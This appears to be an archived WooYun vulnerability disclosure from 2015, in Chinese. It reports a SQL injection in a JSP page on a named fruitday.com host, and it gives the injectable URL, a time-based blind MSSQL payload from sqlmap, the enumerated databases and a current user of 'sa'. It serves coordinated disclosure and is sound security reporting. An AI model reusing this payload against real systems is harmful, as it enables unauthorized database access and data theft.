乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-29: 细节已通知厂商并且等待厂商处理中 2015-09-02: 厂商已经确认,细节仅向厂商公开 2015-09-12: 细节向核心白帽子及相关领域专家公开 2015-09-22: 细节向普通白帽子公开 2015-10-02: 细节向实习白帽子公开 2015-10-17: 细节向公众公开
sql注入
注入点
http://hq.fruitday.com:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: http://hq.fruitday.com:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5 WAITFOR DELAY '0:0:5'&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415='---
web application technology: JSPback-end DBMS: Microsoft SQL Server 2008
数据库
available databases [7]:[*] ecology[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
当期用户 当期数据库
current user: 'sa'current database: 'ecology'
危害等级:高
漏洞Rank:15
确认时间:2015-09-02 10:29
非常感谢您提供的信息,我们会尽快确认。
暂无